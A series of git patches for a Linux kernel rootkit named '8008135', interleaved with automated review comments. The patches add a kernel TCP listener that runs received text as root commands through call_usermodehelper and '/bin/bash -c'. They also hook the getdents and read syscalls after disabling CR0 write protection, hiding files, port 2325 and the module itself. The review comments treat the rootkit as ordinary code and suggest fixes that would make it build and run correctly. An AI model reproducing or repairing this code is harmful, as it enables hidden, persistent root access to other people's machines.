From 4aa1387a8972019fee553350c771cbd864254f39 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sat, 7 Dec 2019 15:37:35 +0100 Subject: [PATCH 01/12] Adding call_usermodehelper to input commands as root --- src/50ck3t.c | 39 +++++++++++++++++++++++++++------------ 1 file changed, 27 insertions(+), 12 deletions(-) diff --git a/src/50ck3t.c b/src/50ck3t.c index 9302803..f925d07 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c @@ -31,9 +31,19 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "50ck3t.h" - +#ifdef HARMLESS +#else + #include +#endif /**** types ******************************************************************* *******************************************************************************/ +#ifdef HARMLESS +#else + static char *SEnvP[] = { + "HOME=/", + NULL + }; +#endif struct tcp_conn_handler_data{ struct sockaddr_in *FAddress; struct socket *FAcceptSocket; @@ -178,7 +188,6 @@ int connection_handler(void *AData){ unsigned char LInBuf[LLen+1]; unsigned char LOutBuf[LLen+1]; - DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); 
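Review bot: The `#ifdef HARMLESS` / `#else` pairs added here, both around the new include and around the `SEnvP` definition, leave the first branch empty, which reads as an inverted guard; `#ifndef HARMLESS` expresses the same condition without the empty branch. The same empty-branch shape recurs in patch 06's hunks in this file (the `#else`/`#endif` pair after `LOutBuf`, where it is the `#else` branch that is empty). `static char *SEnvP[]` holds only string literals, so `static char *const SEnvP[]` would also document that the table is never rewritten, if the `call_usermodehelper` signature in the target kernel accepts it.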
@@ -221,21 +230,30 @@ int connection_handler(void *AData){ LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\ MSG_DONTWAIT); if(LRet > 0){ - if(memcmp(LInBuf, "HOLA", 4) == 0){ +#ifdef HARMLESS + if(memcmp(LInBuf, "HOLA", 4) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "HOLASI"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); - } - if(memcmp(LInBuf, "ADIOS", 5) == 0){ + } + if(memcmp(LInBuf, "ADIOS", 5) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "ADIOSAMIGO"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); break; - } + } +#else + int Ret; + printk(LInBuf); + char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL}; + printk("Calling usermodehelper"); + Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC); + printk("\nRet is %i \n", Ret); +#endif } } @@ -309,10 +327,8 @@ int tcp_server_accept(void){ __set_current_state(TASK_RUNNING); remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); - pr_info("accept connection\n"); - LAcceptErr = - LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); + LAcceptErr = LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d while accepting " @@ -326,9 +342,8 @@ int tcp_server_accept(void){ addr_len = sizeof(struct sockaddr_in); - LAcceptErr = - LAcceptSocket->ops->getname(LAcceptSocket,\ - (struct sockaddr *)LClient,\ + LAcceptErr = LAcceptSocket->ops->getname(LAcceptSocket, + (struct sockaddr *)LClient, &addr_len, 2); if(LAcceptErr < 0){ From 500087d2ca926c4b65e7508b202a1a5f42de335e Mon Sep 17 00:00:00 2001 
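Review bot: `printk(LInBuf);` in the new `#else` branch passes the received bytes as the format string, so any `%` directives in the data are interpreted by printk instead of being printed; log it with a literal format, `printk(KERN_INFO "%s\n", LInBuf);`. The other two new printk calls (`"Calling usermodehelper"` and `"\nRet is %i \n"`) carry no KERN_ level, and `int Ret;` plus `char *LArgV[]` are declared after statements inside the `if(LRet > 0)` body, which the kernel's -Wdeclaration-after-statement warns about. `LInBuf` is `unsigned char[]` while `LArgV` is `char *[]`, so that initializer also draws a pointer-sign warning. The enclosing connection_handler body extends beyond this hunk on both sides.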
From: valentin_lechner Date: Sun, 8 Dec 2019 01:10:48 +0000 Subject: [PATCH 02/12] exporting functions to files --- Makefile | 4 + src/637d3n75.c | 72 ++++++++++++++++ src/8008135.c | 165 ++++-------------------------------- src/h1d3m0dul3.c | 36 ++++++++ src/h1d3p0r7.c | 91 ++++++++++++++++++++ src/headers/50ck3t.h | 10 ++- src/headers/5y563n.h | 2 + src/headers/637d3n75.h | 32 +++++++ src/headers/8008135.h | 4 +- src/headers/h1d3m0dul3.h | 26 ++++++ src/headers/h1d3p0r7.h | 31 +++++++ src/headers/p463unpr073c7.h | 31 +++++++ src/p463unpr073c7.c | 48 +++++++++++ 13 files changed, 398 insertions(+), 154 deletions(-) create mode 100644 src/637d3n75.c create mode 100644 src/h1d3m0dul3.c create mode 100644 src/h1d3p0r7.c create mode 100644 src/headers/5y563n.h create mode 100644 src/headers/637d3n75.h create mode 100644 src/headers/h1d3m0dul3.h create mode 100644 src/headers/h1d3p0r7.h create mode 100644 src/headers/p463unpr073c7.h create mode 100644 src/p463unpr073c7.c diff --git a/Makefile b/Makefile index 255fc67..1c688ae 100644 --- a/Makefile +++ b/Makefile @@ -20,6 +20,10 @@ obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o $(MNAME)-y += src/50ck3t.o +$(MNAME)-y += src/637d3n75.o +$(MNAME)-y += src/h1d3p0r7.o +$(MNAME)-y += src/h1d3m0dul3.o +$(MNAME)-y += src/p463unpr073c7.o # Includes for header files etc ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) diff --git a/src/637d3n75.c b/src/637d3n75.c new file mode 100644 index 0000000..24afd60 --- /dev/null +++ b/src/637d3n75.c 
@@ -0,0 +1,72 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +/*******************************************************************************/ + + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "637d3n75.h" + + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: sys_getdents_new +* DESCRIPTION: function overriding the original getdents +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count){ + int boff; + struct linux_dirent* ent; + + long ret = sys_getdents_orig(fd, dirent, count); + + char* dbuf; + + if (ret <= 0) { + return ret; + } + + dbuf = (char*)dirent; + + // go through the entries, looking for one that has our prefix + for (boff = 0; boff < ret;) { + + ent = (struct linux_dirent*)(dbuf + boff); + + // if it has hide prefix or module name anywhere, hide it + if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) + || (strstr(ent->d_name, MODULE_NAME) != 
NULL)) { + // remove this entry by copying everything after it forward + // and adjust the length reported + memcpy(dbuf + boff, + dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); + ret -= ent->d_reclen; + } else { + // on to the next entry + boff += ent->d_reclen; + } + } + + return ret; +} diff --git a/src/8008135.c b/src/8008135.c index 2189d71..c8be593 100644 --- a/src/8008135.c +++ b/src/8008135.c 
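Review bot: `memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));` copies between two regions of the same buffer that overlap whenever more than `d_reclen` bytes follow the removed record, and memcpy's contract forbids overlapping operands; `memmove` with the same arguments is the correct call (the copy of this loop being deleted from 8008135.c in this commit had the same defect). `boff` is `int` while `ret` is `long`, so the `boff < ret` test and the length arithmetic mix widths; declaring `long boff;` keeps them consistent. The license banner at the top of this new file is the `main.c` banner copied verbatim and still says `* main.c`; the same copied banner appears in h1d3m0dul3.c, h1d3p0r7.c, p463unpr073c7.c and the new headers, and each should name its own file.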
@@ -17,167 +17,35 @@ * with this program. If not, see . */ +/*******************************************************************************/ + /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" #include "50ck3t.h" -/**** var ******************************************************************** -*******************************************************************************/ - -sys_getdents_t sys_getdents_orig = NULL; - -/*** FUNCTION **************************************************************** -* NAME: sys_getdents_new -* DESCRIPTION: function overriding the original getdents -* PARAMETERS: - -* RETURNS: - -*******************************************************************************/ -asmlinkage long sys_getdents_new(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count){ - int boff; - struct linux_dirent* ent; - - long ret = sys_getdents_orig(fd, dirent, count); - - char* dbuf; - - if (ret <= 0) { - return ret; - } - - dbuf = (char*)dirent; - - // go through the entries, looking for one that has our prefix - for (boff = 0; boff < ret;) { - - ent = (struct linux_dirent*)(dbuf + boff); - - // if it has hide prefix or module name anywhere, hide it - if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { -#if defined DEBUG - printk("\n hide prefix or mod name contained!\n"); - printk("\n ret %ld\n ", ret); - printk("\n dbuf %d\n" , dbuf); - printk("\n"); - printk(ent->d_name); -#endif - // remove this entry by copying everything after it forward - // and adjust the length reported -#if defined DEBUG - printk("\n reclen %u \n", ent->d_reclen); -#endif - memcpy(dbuf + boff, - dbuf + boff + ent->d_reclen, - ret - (boff + ent->d_reclen)); - ret -= ent->d_reclen; -#if defined DEBUG - printk("\n ret after change %ld\n ", ret); -#endif - } else { - // on to the 
next entry - boff += ent->d_reclen; - } - } - - return ret; -} - - -/*** FUNCTION **************************************************************** -* NAME: hide port -* DESCRIPTION: hides the port 2325 -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -read_ptr orig_read; -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) -{ - long result, bp, diff_in_bytes; - char *kbuf, *start_line, *end_line, *port_num; - char *pathname, pbuf[256]; - struct files_struct *current_files; - struct fdtable *files_table; - struct path file_path; - - // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) - return result; - - // get pathname - // CITATION [8] from report - current_files = current->files; - files_table = files_fdtable(current_files); - - file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) - return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) - return -1; - if (copy_from_user(kbuf,buf,result)) - return -1; - - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line - diff_in_bytes = (start_line - kbuf) * sizeof(char); - for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { - start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); - diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); - result -= diff_in_bytes; - } - } - - // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) - return EINVAL; - if (copy_to_user(buf,kbuf,result)) - return EINVAL; - 
kfree(kbuf); - } - // return number of bytes read - return result; -} - - -/*** FUNCTION **************************************************************** -* NAME: hide_module -* DESCRIPTION: hides the module from lsmod -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -void hide_module(void){ - list_del(&THIS_MODULE->list); -} +#include "637d3n75.h" +#include "h1d3m0dul3.h" +#include "h1d3p0r7.h" +#include "p463unpr073c7.h" +/*******************************************************************************/ /*** FUNCTION **************************************************************** * NAME: 8008135_init -* DESCRIPTION: initializing Kernel Module +* DESCRIPTION: initializing Kernel Module - hijacking syscalltable * PARAMETERS: - * RETURNS: int *******************************************************************************/ static int __init init_8008135(void) { printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); - // record the original getdents handler + sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); // turn write protect off - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); + wprotectionoff(); // add our new handlers sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; @@ -187,7 +55,7 @@ static int __init init_8008135(void) { sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); + wprotectionon(); printk(KERN_INFO "New syscall in place\n"); network_server_init(); 
@@ -205,16 +73,17 @@ static int __init init_8008135(void) { *******************************************************************************/ static void __exit exit_8008135(void) { network_server_exit(); - // allow us to write to read onlu pages - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - // set getdents handler back + wprotectionoff(); sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); + wprotectionon(); printk(KERN_INFO "Old syscall back\n"); } -// Setting pointers to init-/exit-functions +/*******************************************************************************/ + module_init(init_8008135); module_exit(exit_8008135); + +/*******************************************************************************/ diff --git a/src/h1d3m0dul3.c b/src/h1d3m0dul3.c new file mode 100644 index 0000000..3a8ce87 --- /dev/null +++ b/src/h1d3m0dul3.c 
@@ -0,0 +1,36 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "h1d3m0dul3.h" + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: hide_module +* DESCRIPTION: hides the module from lsmod +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +void hide_module(void){ + list_del(&THIS_MODULE->list); +} diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c new file mode 100644 index 0000000..f16e715 --- /dev/null +++ b/src/h1d3p0r7.c 
@@ -0,0 +1,91 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "h1d3p0r7.h" + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: hide port +* DESCRIPTION: hides the port 2325 +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ + +asmlinkage long hacked_read(unsigned int fd, char __user *buf, + size_t count) +{ + long result, bp, diff_in_bytes; + char *kbuf, *start_line, *end_line, *port_num; + char *pathname, pbuf[256]; + struct files_struct *current_files; + struct fdtable *files_table; + struct path file_path; + + // run real read + result = (*orig_read)(fd,buf,count); + if (result <= 0) + return result; + + // get pathname + // CITATION [8] from report + current_files = current->files; + files_table = files_fdtable(current_files); + + file_path = files_table->fd[fd]->f_path; + pathname = d_path(&file_path,pbuf,256*sizeof(char)); + // if virtual 
file /proc/net/tcp + if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { + // copy from user to kernelspace; + if (!access_ok(VERIFY_READ,buf,result)) + return -1; + if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + return -1; + if (copy_from_user(kbuf,buf,result)) + return -1; + + // filter out hidden ports + start_line = strchr(kbuf,':') - 4; // skip first line + diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; + port_num = strchr(strchr(start_line,':') + 1,':') + 1; + end_line = strchr(start_line,'\n'); + diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); + if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port + memmove(start_line,end_line + 1, // delete line in file + result - bp - diff_in_bytes); + result -= diff_in_bytes; + } + } + + // copy from kernel to userspace + if (!access_ok(VERIFY_WRITE,buf,result)) + return EINVAL; + if (copy_to_user(buf,kbuf,result)) + return EINVAL; + kfree(kbuf); + } + // return number of bytes read + return result; +} diff --git a/src/headers/50ck3t.h b/src/headers/50ck3t.h index b9c7b35..b67c59d 100644 --- a/src/headers/50ck3t.h +++ b/src/headers/50ck3t.h @@ -16,8 +16,8 @@ * You should have received a copy of the GNU General Public License along * with this program. If not, see . */ -#ifndef SRC_HEADERS_50CK3T_H_ -#define SRC_HEADERS_50CK3T_H_ +#ifndef SRC_HEADERS_50CK3T_H +#define SRC_HEADERS_50CK3T_H /**** includes ***************************************************************** *******************************************************************************/ 
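Review bot: `kbuf` is leaked on three of the four exits inside the `/proc/net/tcp` branch: the `copy_from_user` failure, the `access_ok(VERIFY_WRITE, ...)` failure and the `copy_to_user` failure all return without `kfree(kbuf)`; only the success path frees it. Those error paths also return a positive `EINVAL` (and a bare `-1`, which callers of a read handler see as -EPERM) where a negative errno such as `-EFAULT` is the convention. A single cleanup label at the end of the branch (`out: kfree(kbuf); return result;`) reached with `result = -EFAULT;` fixes both. This function is moved here from 8008135.c by this commit, so the defects are pre-existing but now live in a file of their own.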
@@ -40,11 +40,15 @@ #include #include +/**** defines ***************************************************************** +*******************************************************************************/ + #define DEFAULT_PORT 2325 +#define DEFAULT_PORT_HEX "0915" #define MAX_CONNS 16 #define MODULE_NAME "8008135" int network_server_init(void); void network_server_exit(void); -#endif /* SRC_HEADERS_50CK3T_H_ */ +#endif diff --git a/src/headers/5y563n.h b/src/headers/5y563n.h new file mode 100644 index 0000000..1b102b4 --- /dev/null +++ b/src/headers/5y563n.h @@ -0,0 +1,2 @@ +#pragma once +#include diff --git a/src/headers/637d3n75.h b/src/headers/637d3n75.h new file mode 100644 index 0000000..feab7cf --- /dev/null +++ b/src/headers/637d3n75.h @@ -0,0 +1,32 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_637d3n75_H +#define SRC_HEADERS_637d3n75_H + +/**** var ******************************************************************** +*******************************************************************************/ +sys_getdents_t sys_getdents_orig = NULL; + + +extern asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +#endif 
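Review bot: `sys_getdents_t sys_getdents_orig = NULL;` in the new 637d3n75.h is a definition rather than a declaration, so both 637d3n75.c and 8008135.c (which gains `#include "637d3n75.h"` in this commit) emit their own copy and the link fails with a multiple-definition error; the header should carry `extern sys_getdents_t sys_getdents_orig;` and the single definition belongs in 637d3n75.c. h1d3p0r7.h has the same problem with `read_ptr orig_read;`, a tentative definition that collides as well unless the build runs with -fcommon. The header also uses `sys_getdents_t`, `struct linux_dirent` and `__user` without including anything, and 637d3n75.c includes only this header, so that translation unit compiles only if some force-include outside this excerpt provides them.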
diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 0ff10ae..99bc790 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -42,14 +42,12 @@ #define GETDENTS_SYSCALL_NUM 78 #define READ_SYSCALL_NUM 0 -#define WRITE_PROTECT_FLAG (1<<16) #define HIDE_PREFIX "8008135." #define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) #define MODULE_NAME "8008135" #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) -#define HIDE_PORT "0915" // 2325 in Hexadecimal /**** Modinfo **************************************************************** *******************************************************************************/ @@ -73,4 +71,4 @@ typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, unsigned int count); typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, size_t count); -#endif /* SRC_HEADERS_8008135_H */ +#endif diff --git a/src/headers/h1d3m0dul3.h b/src/headers/h1d3m0dul3.h new file mode 100644 index 0000000..14182ae --- /dev/null +++ b/src/headers/h1d3m0dul3.h @@ -0,0 +1,26 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_h1d3m0dul3_H +#define SRC_HEADERS_h1d3m0dul3_H + + +extern void hide_module(void); + +#endif diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h new file mode 100644 index 0000000..65ab39d 
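Review bot: Deleting `#define HIDE_PORT "0915"` from 8008135.h breaks `hacked_read` in the new h1d3p0r7.c, which still compares with `strncmp(port_num,HIDE_PORT,4)`, while the replacement `DEFAULT_PORT_HEX "0915"` added to 50ck3t.h in this commit is never referenced. Either keep `HIDE_PORT` or change the comparison to `DEFAULT_PORT_HEX`; as the commit stands, h1d3p0r7.c does not build. The same hunk keeps `MODULE_NAME "8008135"` here while 50ck3t.h defines it too, so one of the two should go.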
--- /dev/null +++ b/src/headers/h1d3p0r7.h @@ -0,0 +1,31 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_h1d3p0r7_H +#define SRC_HEADERS_h1d3p0r7_H + +#include "50ck3t.h" +/**** var ********************************************************************** +*******************************************************************************/ +read_ptr orig_read; + +extern asmlinkage long hacked_read(unsigned int fd, char __user *buf, + size_t count) + +#endif diff --git a/src/headers/p463unpr073c7.h b/src/headers/p463unpr073c7.h new file mode 100644 index 0000000..a474e8f --- /dev/null +++ b/src/headers/p463unpr073c7.h 
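Review bot: The prototype `extern asmlinkage long hacked_read(unsigned int fd, char __user *buf, size_t count)` in h1d3p0r7.h has no terminating semicolon, so in h1d3p0r7.c the declaration runs straight into the function definition that follows the include and the compiler reports a syntax error; add `;` after `size_t count)`. `read_ptr` is typedef'd in 8008135.h, which this header does not include (it includes only `50ck3t.h`), so the type is undeclared here unless 50ck3t.h pulls 8008135.h in. `read_ptr orig_read;` is a variable definition in a header, as noted for 637d3n75.h in this commit.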
@@ -0,0 +1,31 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_p463unpr073c7_H +#define SRC_HEADERS_p463unpr073c7_H + + +/**** defines ***************************************************************** +*******************************************************************************/ +#define WRITE_PROTECT_FLAG (1<<16) + +extern void wprotectionoff(void); +extern void wprotectionon(void); + +#endif diff --git a/src/p463unpr073c7.c b/src/p463unpr073c7.c new file mode 100644 index 0000000..904825a --- /dev/null +++ b/src/p463unpr073c7.c 
@@ -0,0 +1,48 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "p463unpr073c7.h" + +/*******************************************************************************/ + + +/*** FUNCTION **************************************************************** +* NAME: wprotectionoff +* DESCRIPTION: turn page write protection off +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +void wprotectionoff(void){ + write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); +} + +/*** FUNCTION **************************************************************** +* NAME: wprotectionon +* DESCRIPTION: turn page write protection on +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ + +void wprotectionon(void){ + write_cr0(read_cr0() | WRITE_PROTECT_FLAG); +} From dcd4c6588a9a5d9d1607d0fe86a97e76df1395ad Mon Sep 17 00:00:00 2001 
From: valentin lechner <2909278-valentin_lechner@users.noreply.gitlab.com> Date: Sun, 8 Dec 2019 01:13:25 +0000 Subject: [PATCH 03/12] Delete 5y563n.h --- src/headers/5y563n.h | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 src/headers/5y563n.h diff --git a/src/headers/5y563n.h b/src/headers/5y563n.h deleted file mode 100644 index 1b102b4..0000000 --- a/src/headers/5y563n.h +++ /dev/null @@ -1,2 +0,0 @@ -#pragma once -#include From bbf48681e01f0cbadaefe0b0da3e4e5a01e30daa Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 11:59:14 +0100 Subject: [PATCH 04/12] Tun wir mal so als ob wir Helper Funktionen benutzen wrden --- src/610b415.c | 20 ++++++++++++++++++++ src/headers/610b415.h | 13 +++++++++++++ 2 files changed, 33 insertions(+) create mode 100644 src/610b415.c create mode 100644 src/headers/610b415.h diff --git a/src/610b415.c b/src/610b415.c new file mode 100644 index 0000000..31acbea --- /dev/null +++ b/src/610b415.c @@ -0,0 +1,20 @@ +/* + * 610b415.c + * + * Created on: Dec 6, 2019 + * Author: vlr + */ + +#include "610b415.h" + +char * stringRemoveChars(char *AString, char *ASpanset){ + char *LPtr = AString; + LPtr = strpbrk(LPtr, ASpanset); + + while(LPtr != NULL) { + *LPtr = ' '; + LPtr = strpbrk(LPtr, AString); + } + + return AString; +} diff --git a/src/headers/610b415.h b/src/headers/610b415.h new file mode 100644 index 0000000..3fcf6ac --- /dev/null +++ b/src/headers/610b415.h @@ -0,0 +1,13 @@ +/* + * 610b415.h + * + * Created on: Dec 6, 2019 + * Author: vlr + */ + +#ifndef SRC_HEADERS_610B415_H_ +#define SRC_HEADERS_610B415_H_ + +extern char * stringRemoveChars(char *AString, char *ASpanset); + +#endif /* SRC_HEADERS_610B415_H_ */ From 04f29d2e032aa255c33a54e669d7151d5228b587 Mon Sep 17 00:00:00 2001 
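Review bot: In stringRemoveChars the loop step `LPtr = strpbrk(LPtr, AString);` searches for any character of `AString` (the string being edited) instead of `ASpanset`, and it starts at `LPtr`, whose character was just overwritten with `' '`; that space is now part of `AString`, so strpbrk returns `LPtr` again and the loop never terminates once a single match is found. The intended step is `LPtr = strpbrk(LPtr + 1, ASpanset);`. `ASpanset` is never written through, so it should be `const char *ASpanset` in both the definition and the prototype in 610b415.h, and neither file includes a header that declares `strpbrk` (for example `<linux/string.h>`), so the call is an implicit declaration.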
